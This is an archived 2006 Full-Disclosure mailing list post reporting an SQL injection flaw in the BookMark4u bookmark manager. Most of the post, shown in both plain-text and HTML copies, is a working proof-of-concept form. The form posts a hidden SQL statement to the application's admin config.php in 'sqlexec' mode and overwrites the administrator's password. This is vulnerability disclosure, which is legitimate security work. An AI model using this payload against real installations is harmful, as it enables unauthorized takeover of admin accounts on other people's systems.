[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Sql Injection in BookMark4u
From: "(M.o.H.a.J.a.L.i)" <mohajali2k4 () gmail ! com>
Date: 2006-04-20 16:46:43
Message-ID: 470c3dd0604200946m668e0b6aq3135032d65520002 () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
[Attachment #4 (text/plain)]
site:
http://bookmark4u.sourceforge.net/
Hello i found a vulnerability in bookmark4u that u can use to make sql
injections...
the following PoC changes the admin password:
[code]
<form action='http://bookmark4u.sourceforge.net/v2.0.0/admin/config.php'
method='post'>
<tr><td align='center'>
<input type='hidden' name='sqlcmd' value="# add a administrator
(initial password
is 'test') %NL%UPDATE bk4u_passwd SET passwd=PASSWORD('asdfg') WHERE
user='admin';">
<input type='hidden' name='mode' value='sqlexec'>
<input type='submit' value="Execute Above (administrator's account)">
</td></tr>
</form></table>
<br><a href='javascript:document.location.reload();'>And Reload this
page</a>.</body></html>
[/code]
MoHaJaLi
[Attachment #5 (text/html)]
<div>site:</div>
<div><a onclick="return top.js.OpenExtLink(window,event,this)" \
href="http://bookmark4u.sourceforge.net/" \
target="_blank">http://bookmark4u.sourceforge.net/</a></div> <div> </div>
<div>Hello i found a vulnerability in bookmark4u that u can use to make sql \
injections...</div> <div> </div>
<div>the following PoC changes the admin password:</div>
<div>[code]<br>
<div style="DIRECTION: ltr"><span class="q">
<p><form action='<a \
href="http://bookmark4u.sourceforge.net/v2.0.0/admin/config.php">http://bookmark4u.sourceforge.net/v2.0.0/admin/config.php</a>' \
method='post'><br> <tr><td align='center'><br> <input \
type='hidden' name='sqlcmd' value="# add a administrator (initial \
</p></span>password is 'test') %NL%UPDATE bk4u_passwd SET \
passwd=PASSWORD('asdfg') WHERE <span class="q">user='admin';"><br> \
<input type='hidden' name='mode' value='sqlexec'><br> <input \
type='submit' value="Execute Above (administrator's account)"> \
<br> </td></tr><br> </form></table> \
<br><br><a href='javascript:document.location.reload();'>And Reload this \
page</a>.</body></html></span></div><span class="q"></span> </div>
<div>[/code]</div>
<div> </div>
<div>MoHaJaLi</div>
<div> </div>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic